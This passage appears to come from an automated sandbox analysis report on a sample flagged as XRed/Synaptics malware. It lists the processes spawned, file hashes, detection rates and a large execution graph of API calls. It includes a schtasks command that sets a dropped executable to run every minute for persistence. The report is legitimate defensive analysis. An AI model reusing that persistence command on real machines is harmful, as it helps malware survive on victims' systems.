                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:05:25:19
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\Desktop\._cache_JPS.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\._cache_JPS.exe"
                                                                                                                                                      Imagebase:0xa90000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2564672501.00000000040E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 68%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:05:25:19
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:771'584 bytes
                                                                                                                                                      MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1387520897.0000000000535000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:05:25:20
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                      Imagebase:0x6d0000
                                                                                                                                                      File size:53'161'064 bytes
                                                                                                                                                      MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:05:25:21
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                                                                                                                                      Imagebase:0xc30000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:05:25:21
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff68cce0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:05:25:21
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                                                                                                                                                      Imagebase:0xe60000
                                                                                                                                                      File size:147'456 bytes
                                                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2555561177.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2554418377.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:05:25:22
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                                                                                                                                                      Imagebase:0x490000
                                                                                                                                                      File size:187'904 bytes
                                                                                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:05:25:24
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 68%, ReversingLabs
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:05:25:32
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:15
                                                                                                                                                      Start time:05:25:40
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:771'584 bytes
                                                                                                                                                      MD5 hash:B50AAC59E97F3D38A19ACB9253FABEBC
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:16
                                                                                                                                                      Start time:05:25:49
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:19
                                                                                                                                                      Start time:05:25:57
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432
                                                                                                                                                      Imagebase:0xe0000
                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:20
                                                                                                                                                      Start time:05:25:57
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:21
                                                                                                                                                      Start time:05:26:01
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:05:27:00
                                                                                                                                                      Start date:30/12/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                                                                                                                                                      Imagebase:0x730000
                                                                                                                                                      File size:1'217'536 bytes
                                                                                                                                                      MD5 hash:FBE9E7E00A80A2321BADFA4E962FE15E
                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:true


                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:4.3%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:10.1%
                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                        Total number of Limit Nodes:35
103762->103695 103766 aebfd9 _memset 103763->103766 103764 aec033 103941 aec235 413 API calls Mailbox 103764->103941 103766->103764 103768 aec14c 103766->103768 103771 aec097 VariantInit 103766->103771 103767 aec22e 103767->103728 103768->103764 103769 aec19f VariantInit VariantClear 103768->103769 103770 aec1c5 103769->103770 103770->103764 103772 aec1e6 103770->103772 103775 aec0d6 103771->103775 103940 ada6f6 103 API calls 103772->103940 103774 aec20d VariantClear 103774->103767 103775->103764 103939 ada6f6 103 API calls 103775->103939 103777->103672 103779 a9fa60 103778->103779 103815 a9fa8e Mailbox _memmove 103778->103815 103780 ab010a 48 API calls 103779->103780 103780->103815 103781 aa105e 103783 a9c935 48 API calls 103781->103783 103782 aa1063 104378 add520 86 API calls 4 library calls 103782->104378 103808 a9fbf1 Mailbox 103783->103808 103784 aca599 InterlockedDecrement 103784->103815 103785 a9d3d2 48 API calls 103785->103815 103786 aa0119 104379 add520 86 API calls 4 library calls 103786->104379 103789 aa0dee 103795 a9d89e 50 API calls 103789->103795 103790 a9c935 48 API calls 103790->103815 103792 ab1b2a 52 API calls __cinit 103792->103815 103793 ab010a 48 API calls 103793->103815 103794 aa0dfa 103797 a9d89e 50 API calls 103794->103797 103795->103794 103796 b0b772 104380 add520 86 API calls 4 library calls 103796->104380 103800 aa0e83 103797->103800 104367 a9caee 103800->104367 103802 b0b7d2 103807 aa1230 103807->103808 104377 add520 86 API calls 4 library calls 103807->104377 103808->103715 103809 a9fa40 413 API calls 103809->103815 103812 b0b583 104375 add520 86 API calls 4 library calls 103812->104375 103814 aa10f1 Mailbox 104376 add520 86 API calls 4 library calls 103814->104376 103815->103781 103815->103782 103815->103784 103815->103785 103815->103786 103815->103789 103815->103790 103815->103792 103815->103793 103815->103794 103815->103796 103815->103800 103815->103807 103815->103808 103815->103809 103815->103812 103815->103814 103942 a9f6d0 
103815->103942 104014 af798d 103815->104014 104019 af30ad 103815->104019 104073 ae9122 103815->104073 104087 a981c6 103815->104087 104157 aaef0d 103815->104157 104200 ae92c0 103815->104200 104218 aadd84 103815->104218 104221 aaf03e 103815->104221 104224 af17aa 103815->104224 104229 ae013f 103815->104229 104242 af1f19 103815->104242 104245 af10e5 103815->104245 104251 af0bfa 103815->104251 104254 a950a3 103815->104254 104259 ae8065 GetCursorPos GetForegroundWindow 103815->104259 104273 af804e 103815->104273 104287 aaf461 103815->104287 104325 aeb74b VariantInit 103815->104325 104366 aa1620 59 API calls Mailbox 103815->104366 104371 aeee52 82 API calls 2 library calls 103815->104371 104372 aeef9d 90 API calls Mailbox 103815->104372 104373 adb020 48 API calls 103815->104373 104374 aee713 413 API calls Mailbox 103815->104374 103834->103697 103835->103718 103836->103730 103840 ab0112 __calloc_impl 103837->103840 103839 ab012c 103839->103694 103840->103839 103841 ab012e std::exception::exception 103840->103841 105847 ab45ec 103840->105847 105861 ab7495 RaiseException 103841->105861 103843 ab0158 105862 ab73cb 47 API calls _free 103843->105862 103845 ab016a 103845->103694 103847 a9d38b 103846->103847 103848 a9d3b4 103847->103848 105869 a9d772 55 API calls 103847->105869 103850 a9d2d2 103848->103850 103853 a9d2df 103850->103853 103854 a9d30a 103850->103854 103851 a9d2e6 103851->103854 105870 a9d349 53 API calls 103851->105870 103853->103851 105871 a9d349 53 API calls 103853->105871 103854->103686 103856->103696 103857->103659 103858->103681 103859->103681 103860->103681 103862 a9d8ac 103861->103862 103869 a9d8db Mailbox 103861->103869 103863 a9d8ff 103862->103863 103865 a9d8b2 Mailbox 103862->103865 103864 a9c935 48 API calls 103863->103864 103864->103869 103866 a9d8c7 103865->103866 103867 b04e9b 103865->103867 103868 b04e72 VariantClear 103866->103868 103866->103869 103867->103869 105872 aca599 InterlockedDecrement 103867->105872 103868->103869 103869->103692 
103871->103721 103873 aa1606 103872->103873 103875 aa14b2 103872->103875 103873->103738 103874 aa14be 103880 aa14c9 103874->103880 105874 a9346e 48 API calls 103874->105874 103875->103874 103877 ab010a 48 API calls 103875->103877 103878 b05299 103877->103878 103879 ab010a 48 API calls 103878->103879 103887 b052a4 103879->103887 103881 aa156d 103880->103881 103882 ab010a 48 API calls 103880->103882 103881->103738 103883 aa15af 103882->103883 103884 aa15c2 103883->103884 105873 aad6b4 48 API calls 103883->105873 103884->103738 103886 ab010a 48 API calls 103886->103887 103887->103874 103887->103886 103888->103724 103890 a984be 103889->103890 103904 a984ba 103889->103904 103891 b05592 __i64tow 103890->103891 103892 b05494 103890->103892 103893 a984d2 103890->103893 103901 a984ea __itow Mailbox _wcscpy 103890->103901 103894 b0557a 103892->103894 103895 b0549d 103892->103895 105875 ab234b 80 API calls 4 library calls 103893->105875 105876 ab234b 80 API calls 4 library calls 103894->105876 103900 b054bc 103895->103900 103895->103901 103897 ab010a 48 API calls 103899 a984f4 103897->103899 103902 a9caee 48 API calls 103899->103902 103899->103904 103903 ab010a 48 API calls 103900->103903 103901->103897 103902->103904 103905 b054d9 103903->103905 103904->103746 103906 ab010a 48 API calls 103905->103906 103907 b054ff 103906->103907 103907->103904 103908 a9caee 48 API calls 103907->103908 103908->103904 103909->103752 103911 a9ca9a 103910->103911 103912 a9cad0 103910->103912 103917 ab010a 48 API calls 103911->103917 103913 a9cad9 103912->103913 103914 a9cae3 103912->103914 103915 a97e53 48 API calls 103913->103915 103916 a9c4cd 48 API calls 103914->103916 103921 a9cac6 103915->103921 103916->103921 103918 a9caad 103917->103918 103919 b04f11 103918->103919 103920 a9cab8 103918->103920 103919->103921 103923 a9d3d2 48 API calls 103919->103923 103920->103921 103922 a9caee 48 API calls 103920->103922 103921->103699 103922->103921 103923->103921 103924->103708 103925->103694 103927 
a9c948 103926->103927 103928 a9c940 103926->103928 103927->103687 103929 a9d805 48 API calls 103928->103929 103929->103927 103930->103691 103931->103705 103932->103694 103933->103694 103934->103720 103935->103706 103936->103675 103937->103694 103938->103762 103939->103768 103940->103774 103941->103767 103943 a9f708 103942->103943 103948 a9f77b 103942->103948 103944 b0c4d5 103943->103944 103945 a9f712 103943->103945 103950 b0c4e2 103944->103950 103951 b0c4f4 103944->103951 103946 a9f71c 103945->103946 103966 b0c544 103945->103966 103956 b0c6a4 103946->103956 103965 a9f72a 103946->103965 104009 a9f741 103946->104009 103947 a9fa40 413 API calls 103986 a9f787 103947->103986 103949 b0c253 103948->103949 103948->103986 104404 add520 86 API calls 4 library calls 103949->104404 104381 aef34f 103950->104381 104412 aec235 413 API calls Mailbox 103951->104412 103952 b0c585 103962 b0c590 103952->103962 103963 b0c5a4 103952->103963 103959 a9c935 48 API calls 103956->103959 103957 b0c264 103957->103815 103958 b0c507 103961 b0c50b 103958->103961 103958->104009 103959->104009 104413 add520 86 API calls 4 library calls 103961->104413 103967 aef34f 413 API calls 103962->103967 104415 aed154 48 API calls 103963->104415 103965->104009 104513 aca599 InterlockedDecrement 103965->104513 103966->103952 103978 b0c569 103966->103978 103967->104009 103969 b0c45a 103972 a9c935 48 API calls 103969->103972 103970 b0c7b5 103977 b0c7eb 103970->103977 104515 aeef9d 90 API calls Mailbox 103970->104515 103971 b0c5af 103985 b0c62c 103971->103985 103996 b0c5d1 103971->103996 103972->104009 103976 a9f84a 103980 b0c32a 103976->103980 103993 a9f854 103976->103993 103982 a9d89e 50 API calls 103977->103982 104414 add520 86 API calls 4 library calls 103978->104414 103979 b0c793 103984 a984a6 81 API calls 103979->103984 104405 a9342c 103980->104405 104011 a9f770 Mailbox 103982->104011 103999 b0c79b __wsetenvp 103984->103999 104440 adafce 48 API calls 103985->104440 103986->103947 103986->103976 103989 a9f8bb 
103986->103989 103991 ab2241 48 API calls 103986->103991 103997 a9f9d8 103986->103997 103986->104011 103987 b0c7c9 103992 a984a6 81 API calls 103987->103992 103989->103957 103989->103969 103989->104009 104409 aca599 InterlockedDecrement 103989->104409 104411 aef4df 413 API calls 103989->104411 103990 aa14a0 48 API calls 103995 a9f8ab 103990->103995 103991->103986 104003 b0c7d1 __wsetenvp 103992->104003 103993->103990 103995->103989 103995->103997 104416 ada485 48 API calls 103996->104416 104410 add520 86 API calls 4 library calls 103997->104410 103999->103970 104001 a9d89e 50 API calls 103999->104001 104000 b0c63e 104441 aadf08 48 API calls 104000->104441 104001->103970 104003->103977 104006 a9d89e 50 API calls 104003->104006 104005 b0c5f6 104417 aa44e0 104005->104417 104006->103977 104007 b0c647 Mailbox 104442 ada485 48 API calls 104007->104442 104009->103970 104009->104011 104514 aeee52 82 API calls 2 library calls 104009->104514 104011->103815 104012 b0c663 104443 aa3680 104012->104443 105370 a919ee 104014->105370 104018 af79a4 104018->103815 104020 a9ca8e 48 API calls 104019->104020 104021 af30ca 104020->104021 104022 a9d3d2 48 API calls 104021->104022 104023 af30d3 104022->104023 104024 a9d3d2 48 API calls 104023->104024 104025 af30dc 104024->104025 104026 a9d3d2 48 API calls 104025->104026 104027 af30e5 104026->104027 104028 a984a6 81 API calls 104027->104028 104029 af30f4 104028->104029 104030 af3d7b 48 API calls 104029->104030 104031 af3128 104030->104031 104032 af3af7 49 API calls 104031->104032 104033 af3159 104032->104033 104034 af319c RegOpenKeyExW 104033->104034 104035 af3172 RegConnectRegistryW 104033->104035 104043 af315d Mailbox 104033->104043 104037 af31f7 104034->104037 104038 af31c5 104034->104038 104035->104034 104035->104043 104039 a984a6 81 API calls 104037->104039 104041 af31d9 RegCloseKey 104038->104041 104038->104043 104040 af3207 RegQueryValueExW 104039->104040 104042 af323e 104040->104042 104071 af3229 104040->104071 104041->104043 104044 
af344c 104042->104044 104045 af3265 104042->104045 104042->104071 104043->103815 104046 ab010a 48 API calls 104044->104046 104048 af326e 104045->104048 104049 af33d9 104045->104049 104050 af3464 104046->104050 104047 af34eb RegCloseKey 104047->104043 104051 af34fe RegCloseKey 104047->104051 104053 af338d 104048->104053 104054 af3279 104048->104054 105494 adad14 48 API calls _memset 104049->105494 104056 a984a6 81 API calls 104050->104056 104051->104043 104055 a984a6 81 API calls 104053->104055 104058 af32de 104054->104058 104059 af327e 104054->104059 104060 af33a1 RegQueryValueExW 104055->104060 104062 af3479 RegQueryValueExW 104056->104062 104057 af33e4 104063 a984a6 81 API calls 104057->104063 104061 ab010a 48 API calls 104058->104061 104064 a984a6 81 API calls 104059->104064 104059->104071 104060->104071 104065 af32f7 104061->104065 104062->104071 104072 af3331 104062->104072 104066 af33f6 RegQueryValueExW 104063->104066 104067 af329f RegQueryValueExW 104064->104067 104068 a984a6 81 API calls 104065->104068 104066->104047 104066->104071 104067->104071 104069 af330c RegQueryValueExW 104068->104069 104069->104071 104069->104072 104070 a9ca8e 48 API calls 104070->104071 104071->104047 104072->104070 104074 a984a6 81 API calls 104073->104074 104075 ae913f 104074->104075 104076 a9cdb4 48 API calls 104075->104076 104077 ae9149 104076->104077 105495 aeacd3 104077->105495 104079 ae9156 104080 ae915a socket 104079->104080 104084 ae9182 104079->104084 104081 ae916d WSAGetLastError 104080->104081 104082 ae9184 connect 104080->104082 104081->104084 104083 ae91a3 WSAGetLastError 104082->104083 104082->104084 105501 add7e4 104083->105501 104084->103815 104086 ae91b8 closesocket 104086->104084 104088 a984a6 81 API calls 104087->104088 104089 a981e5 104088->104089 104090 a984a6 81 API calls 104089->104090 104091 a981fa 104090->104091 104092 a984a6 81 API calls 104091->104092 104093 a9820d 104092->104093 104094 a984a6 81 API calls 104093->104094 104095 a98223 104094->104095 
104096 a97b6e 48 API calls 104095->104096 104097 a98237 104096->104097 104098 a9cdb4 48 API calls 104097->104098 104153 a9846a 104097->104153 104099 a9825e 104098->104099 104100 b0d752 104099->104100 104127 a98281 __wopenfile 104099->104127 104099->104153 104103 a93320 48 API calls 104100->104103 104101 b0d91e 104105 a93320 48 API calls 104101->104105 104102 b0d95f 104104 a93320 48 API calls 104102->104104 104106 b0d769 104103->104106 104107 b0d96a 104104->104107 104108 b0d928 104105->104108 104135 b0d790 104106->104135 105533 aa2320 50 API calls 104106->105533 105540 aa2320 50 API calls 104107->105540 104110 a984a6 81 API calls 104108->104110 104114 b0d93a 104110->104114 104112 a984a6 81 API calls 104115 a98306 104112->104115 104113 b0d985 104122 a984a6 81 API calls 104113->104122 105539 a980ea 48 API calls _memmove 104114->105539 104119 a984a6 81 API calls 104115->104119 104118 b0d94e 104120 a98182 48 API calls 104118->104120 104121 a9831b 104119->104121 104125 b0d95c 104120->104125 104123 b0d7ed 104121->104123 104128 a98342 104121->104128 104121->104153 104126 b0d9a0 104122->104126 104123->104153 105516 a93320 104123->105516 104124 a98182 48 API calls 104124->104135 105542 aa2320 50 API calls 104125->105542 105541 a980ea 48 API calls _memmove 104126->105541 104127->104112 104127->104123 104145 a98364 104127->104145 104127->104153 104132 a93320 48 API calls 104128->104132 104138 a9834c 104132->104138 104133 b0d9b4 104139 a98182 48 API calls 104133->104139 104135->104124 104137 a9843f Mailbox 104135->104137 105534 a980ea 48 API calls _memmove 104135->105534 105535 aa2320 50 API calls 104135->105535 104136 b0d84a 105536 aa2320 50 API calls 104136->105536 104137->103815 104142 a9c4cd 48 API calls 104138->104142 104139->104125 104142->104145 104145->104137 104146 b0d895 104145->104146 105527 ab247b 59 API calls 3 library calls 104145->105527 105528 a980ea 48 API calls _memmove 104145->105528 105529 a98182 104145->105529 105532 aa2320 50 API calls 104145->105532 
104147 b0d8ce 104146->104147 104148 b0d8bf 104146->104148 104149 a98182 48 API calls 104147->104149 105537 a9bd2f 48 API calls _memmove 104148->105537 104150 b0d8dc 104149->104150 105538 aa2320 50 API calls 104150->105538 104153->104101 104153->104102 104154 b0d8ee 104156 a9c4cd 48 API calls 104154->104156 104156->104153 104158 a9ca8e 48 API calls 104157->104158 104159 aaef25 104158->104159 104160 aaeffb 104159->104160 104161 aaef3e 104159->104161 104162 ab010a 48 API calls 104160->104162 105573 aaf0f3 48 API calls 104161->105573 104164 aaf002 104162->104164 104168 aaf00e 104164->104168 105575 a95080 49 API calls 104164->105575 104165 aaef4d 104166 b06942 104165->104166 104170 aaef73 104165->104170 104171 a9cdb4 48 API calls 104165->104171 104166->103815 104169 a984a6 81 API calls 104168->104169 104172 aaf01c 104169->104172 104173 aaf03e 2 API calls 104170->104173 104174 b06965 104171->104174 104175 a94bf9 56 API calls 104172->104175 104176 aaef7a 104173->104176 104174->104170 104177 b0696d 104174->104177 104178 aaf02b 104175->104178 104179 b06980 104176->104179 104180 aaef87 104176->104180 104181 a9cdb4 48 API calls 104177->104181 104178->104165 104182 b06936 104178->104182 104183 ab010a 48 API calls 104179->104183 104184 a9d3d2 48 API calls 104180->104184 104181->104176 104182->104166 105576 a94592 CloseHandle 104182->105576 104185 b06986 104183->104185 104186 aaef8f 104184->104186 104187 b0699f 104185->104187 105577 a93d65 ReadFile SetFilePointerEx 104185->105577 105544 aaf04e 104186->105544 104194 b069a3 _memmove 104187->104194 105578 adad14 48 API calls _memset 104187->105578 104190 aaef9e 104190->104194 105567 a97bef 104190->105567 104195 aaefb2 Mailbox 104196 aaeff2 104195->104196 104197 a950ec CloseHandle 104195->104197 104196->103815 104198 aaefe4 104197->104198 105574 a94592 CloseHandle 104198->105574 104201 a9a6d4 48 API calls 104200->104201 104202 ae92d2 104201->104202 104203 a984a6 81 API calls 104202->104203 104204 ae92e1 104203->104204 104205 aaf26b 
